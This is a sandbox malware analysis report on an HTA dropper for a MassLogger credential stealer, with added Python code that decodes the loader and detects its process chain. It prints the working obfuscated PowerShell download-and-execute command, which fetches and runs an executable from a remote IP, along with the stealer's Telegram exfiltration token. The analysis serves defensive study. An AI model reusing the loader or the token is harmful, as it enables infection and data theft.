
Windows Analysis Report
needagoodplanforsuccesstogetbackbest.hta

Overview

General Information

Sample name: needagoodplanforsuccesstogetbackbest.hta
Analysis ID: 1640149
MD5: 69de66532cc4a0f299ce46f49e150555
SHA1: 84d95b6fb113d7751509702c72f017875d4aefd8
SHA256: 17bf3cc6ffe8c17c0d724acadc503305ae2fa70ef5571d2303f5c894538a1045
Tags: hta, MassLogger, user-abuse_ch

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7732 cmdline: mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7776 cmdline: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7560 cmdline: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'[same base64 blob as in the parent cmd.exe command line]'+[char]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 2296 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csoss.exe (PID: 2576 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 54DE0C8E192E7BC71B6D284FFF136296)
          • RegSvcs.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Malware configuration (MassLogger): {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
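Decoding the PowerShell stage from the process tree above, as an added example (this is not code from the Joe Sandbox report or from the sample). The obfuscation is shallow: the only tricks are randomised casing, `[char]N` casts that spell the `::` and `"` characters so the string `FromBase64String("` never appears literally, string concatenation, and hundreds of spaces inside the base64-encoded script. The decoder below folds the `[char]` casts the way the inner `iEX` does, pulls out the base64 argument, decodes it and collapses the padding. The command line is rebuilt from the powershell.exe entry (PID 7560); the blob is the one shown there, with its space-padding runs (the repeated `ICAg` group, three spaces each) written as repetitions, so the exact run lengths are an approximation of mine that changes only whitespace in the result. Function names are mine.

```python
"""Decode the obfuscated PowerShell stage recorded in the process tree above.

Added example: not code from the Joe Sandbox report or from the sample.
The command line is rebuilt from the powershell.exe entry (PID 7560); the
base64 blob is the one shown there, with its space-padding runs (the repeated
'ICAg' group = three spaces) written as repetitions. Function names and the
exact run lengths are mine and do not change the decoded tokens.
"""
import base64
import re

PAD = "ICAg"  # base64 of three spaces; the author padded every token with these

B64_BLOB = (
    "JEd2QVYg" + PAD * 11 + "PSAg"
    + PAD * 10 + "ICBBRGQtVFlwRSAg"
    + PAD * 10 + "ICAtTWVtYmVyREVGaU5JdGlPbiAg"
    + PAD * 10 + "ICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAg"
    + PAD * 10 + "IENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMg"
    + "ZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIg"
    + PAD * 11 + "SSxzdHJpbmcg"
    + PAD * 11 + "YXlSVVR0LHN0cmluZyAg"
    + PAD * 10 + "ICBxdU5kcFNxLHVpbnQg"
    + PAD * 11 + "QkksSW50UHRyICAg"
    + PAD * 10 + "IG9oc28pOycg"
    + PAD * 11 + "LU5hbWUg"
    + PAD * 11 + "InJPbFN5IiAg"
    + PAD * 10 + "ICAtbkFNRVNwYWNlICAg"
    + PAD * 10 + "IGRlS3lvTmQg"
    + PAD * 11 + "LVBhc3NUaHJ1OyAg"
    + PAD * 10 + "ICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwi"
    + "JGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAg"
    + PAD * 10 + "ICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI="
)

# Constructed from the report's powershell.exe (PID 7560) command line.
OBFUSCATED_CMDLINE = (
    "POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; "
    "IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+"
    "'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+"
    "'frOMbASe64STrIng('+[CHAr]0x22+'" + B64_BLOB + "'+[char]34+'))')))"
)

_CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_B64_ARG = re.compile(r"FromBase64String\(\s*[\"']?([A-Za-z0-9+/=]+)", re.IGNORECASE)


def fold_char_casts(ps: str) -> str:
    """Turn [char]58 / [Char]0X3a into quoted literals, then glue adjacent
    single-quoted pieces, so '[a]'+[char]58+[char]58+'b' reads '[a]::b'.
    This is what the inner iEX evaluates before the outer IeX runs it."""
    ps = _CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", ps)
    return re.sub(r"'\s*\+\s*'", "", ps)  # '...'+'...'  ->  '......'


def extract_base64_stage(ps: str) -> str:
    """Decode the FromBase64String() argument as UTF-8 text. Padding is
    re-derived so a blob with stripped or doubled '=' still decodes."""
    m = _B64_ARG.search(ps)
    if not m:
        raise ValueError("no FromBase64String() argument found")
    blob = m.group(1).rstrip("=")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8")


def normalise(script: str) -> str:
    """Collapse the space padding so the stage reads as a normal one-liner."""
    return re.sub(r"\s+", " ", script).strip()


def decode_stage(cmdline: str) -> str:
    return normalise(extract_base64_stage(fold_char_casts(cmdline)))


def extract_iocs(script: str) -> dict:
    """What a responder wants from this stage: download URL, drop path, the
    fetch technique, and whether the dropped file is executed."""
    url = re.search(r"https?://[^\s\"']+", script)
    drop = re.search(r"\"(\$env:[^\"]+)\"", script, re.IGNORECASE)
    technique = None
    if re.search(r"DllImport", script, re.I) and re.search(r"URLDownloadToFile", script, re.I):
        technique = "Add-Type P/Invoke of urlmon!URLDownloadToFile (compiled on the fly by csc.exe)"
    return {
        "url": url.group(0) if url else None,
        "drop_path": drop.group(1) if drop else None,
        "technique": technique,
        "executes_drop": bool(re.search(r"invoke-item", script, re.IGNORECASE)),
    }


if __name__ == "__main__":
    stage = decode_stage(OBFUSCATED_CMDLINE)
    print(stage)
    for key, value in extract_iocs(stage).items():
        print(f"{key}: {value}")
```

The decoded line is an `Add-Type -MemberDefinition` P/Invoke of `urlmon!URLDownloadToFile`, a download of `http://23.95.235.28/110/csoss.exe` to `$env:APPDATA\csoss.exe`, a three-second `Start-Sleep`, then `Invoke-Item` on the file. That one line accounts for several other entries in this report: `Add-Type` compiles the C# stub through csc.exe (the csc.exe and cvtres.exe children and the `dkgvurtz.cmdline` drop), `URLDownloadToFile` goes through WinINet (the IE/Trident User-Agent on the `GET /110/csoss.exe` request and the `csoss[1].exe` copy in INetCache), and `Invoke-Item` is the start of csoss.exe (PID 2576).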
Source | Rule | Description | Author
00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0xf1df:$a1: get_encryptedPassword
  • 0xf507:$a2: get_encryptedUsername
  • 0xef7a:$a3: get_timePasswordChanged
  • 0xf09b:$a4: get_passwordField
  • 0xf1f5:$a5: set_encryptedPassword
  • 0x10b51:$a7: get_logins
  • 0x10802:$a8: GetOutlookPasswords
  • 0x105f4:$a9: StartKeylogger
  • 0x10aa1:$a10: KeyLoggerEventArgs
  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
(5 of 17 entries shown)

Source | Rule | Description | Author
7.2.RegSvcs.exe.430000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
7.2.RegSvcs.exe.430000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
7.2.RegSvcs.exe.430000.0.unpack | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
7.2.RegSvcs.exe.430000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
7.2.RegSvcs.exe.430000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0xf1df:$a1: get_encryptedPassword
  • 0xf507:$a2: get_encryptedUsername
  • 0xef7a:$a3: get_timePasswordChanged
  • 0xf09b:$a4: get_passwordField
  • 0xf1f5:$a5: set_encryptedPassword
  • 0x10b51:$a7: get_logins
  • 0x10802:$a8: GetOutlookPasswords
  • 0x105f4:$a9: StartKeylogger
  • 0x10aa1:$a10: KeyLoggerEventArgs
  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
(5 of 13 entries shown)

Source | Rule | Description | Author
amsi32_7560.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

System Summary

Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'[same base64 blob as in the cmd.exe entry of the process tree]'+[char]34+'))')))", CommandLine: (same as Command)
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'[same base64 blob as in the cmd.exe entry of the process tree]'+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", ProcessId: 4064, ProcessName: csc.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7560, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7560, TargetFilename: C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'[same base64 blob as in the cmd.exe entry of the process tree]'+[char]34+'))')))", CommandLine: (same as Command)
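The Sigma hits above are all process-lineage and command-line checks, and the process tree shows a fourth pattern the report flags elsewhere as injection: RegSvcs.exe (PID 5304) runs with csoss.exe's command line, which is what a hollowed host looks like in process-creation telemetry. The following is an added example, not part of the Joe Sandbox report and not the Sigma rules it cites: it runs four such checks over events constructed from the report's process tree. Field names follow Sysmon Event ID 1 (an assumption about the log source), the mshta.exe image path and its parent PID are assumed, the child-process list for mshta is mine, and the long base64 blob is elided from the command lines.

```python
"""Process-tree checks for the chain recorded above (mshta -> cmd -> powershell
-> csc, and csoss.exe -> RegSvcs.exe carrying csoss.exe's command line).

Added example, not part of the Joe Sandbox report and not the Sigma rules it
cites. EVENTS is constructed from the report's process tree; field names are
Sysmon Event ID 1 style (assumed log source), mshta's image path and parent
PID are assumed, the base64 blob is elided.
"""
import re

EVENTS = [
    {"ProcessId": 7732, "ParentProcessId": 1,                    # parent assumed
     "Image": r"C:\Windows\System32\mshta.exe",                  # path assumed
     "CommandLine": r'mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"'},
    {"ProcessId": 7776, "ParentProcessId": 7732,
     "Image": r"C:\Windows\system32\cmd.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX(...)))"'},
    {"ProcessId": 7788, "ParentProcessId": 7776,
     "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 7560, "ParentProcessId": 7776,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX(...)))"},
    {"ProcessId": 4064, "ParentProcessId": 7560,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"'},
    {"ProcessId": 2576, "ParentProcessId": 7560,
     "Image": r"C:\Users\user\AppData\Roaming\csoss.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\csoss.exe"'},
    {"ProcessId": 5304, "ParentProcessId": 2576,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\csoss.exe"'},
]

# Children of mshta.exe worth alerting on (my list, not the Sigma rule's).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Spellings a person or an installer actually types.
NORMAL_PS_SPELLINGS = {"powershell.exe", "PowerShell.exe", "POWERSHELL.EXE"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def cmdline_exe(cmdline: str) -> str:
    """Executable named by the first command-line token, quoted or bare."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', cmdline)
    return basename((m.group(1) or m.group(2) or "") if m else "")


def powershell_case_anomaly(cmdline: str) -> bool:
    """True when powershell.exe appears in a casing nobody types: a cheap proxy
    for the randomised case that obfuscators emit to dodge string matches."""
    return any(tok not in NORMAL_PS_SPELLINGS
               for tok in re.findall(r"(?i)\bpowershell\.exe", cmdline))


def detect(events: list) -> list:
    """Return (ProcessId, rule) pairs for every check that fires."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        pid, img = e["ProcessId"], basename(e["Image"]).lower()
        parent = by_pid.get(e["ParentProcessId"])
        pimg = basename(parent["Image"]).lower() if parent else ""
        if pimg == "mshta.exe" and img in SCRIPT_HOSTS:
            findings.append((pid, "mshta_spawns_script_host"))
        if pimg == "powershell.exe" and img in {"csc.exe", "vbc.exe"}:
            findings.append((pid, "powershell_dynamic_compile"))
        if powershell_case_anomaly(e["CommandLine"]):
            findings.append((pid, "powershell_case_anomaly"))
        # Hollowed host: the command line names a different executable than
        # the one actually loaded (RegSvcs.exe running as "csoss.exe").
        if cmdline_exe(e["CommandLine"]).lower() != img:
            findings.append((pid, "image_cmdline_mismatch"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"PID {pid}: {rule}")
```

The case-anomaly check fires on both the cmd.exe and the powershell.exe events because the mixed-case token sits in both command lines, which matches where the report's "Suspicious MSHTA Child Process" and "PowerShell case anomaly" signatures hit. The mismatch check is the one that singles out PID 5304: a legitimate RegSvcs.exe start names RegSvcs.exe in its own command line.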

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'[same base64 blob as in the cmd.exe entry of the process tree]'+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", ProcessId: 4064, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-17T01:19:04.147044+0100 | 2022050 | 1 | A Network Trojan was detected | 23.95.235.28 | 80 | 192.168.2.4 | 49724 | TCP
2025-03-17T01:19:04.240021+0100 | 2022051 | 1 | A Network Trojan was detected | 23.95.235.28 | 80 | 192.168.2.4 | 49724 | TCP
2025-03-17T01:19:11.071326+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49725 | 193.122.130.0 | 80 | TCP


AV Detection

Source: C:\Users\user\AppData\Roaming\csoss.exe | Avira: detection malicious, Label: TR/AD.SnakeStealer.ergur
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe | Avira: detection malicious, Label: TR/AD.SnakeStealer.ergur
Source: 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\csoss.exe | ReversingLabs: Detection: 83%
Source: needagoodplanforsuccesstogetbackbest.hta | Virustotal: Detection: 46%
Source: needagoodplanforsuccesstogetbackbest.hta | ReversingLabs: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49726 version: TLS 1.0
Source: Binary string: wntdll.pdbUGP | source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.pdb | source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_0021445A
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021C6D1 FindFirstFileW,FindClose, 6_2_0021C6D1
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_0021C75C
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_0021EF95
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_0021F0F2
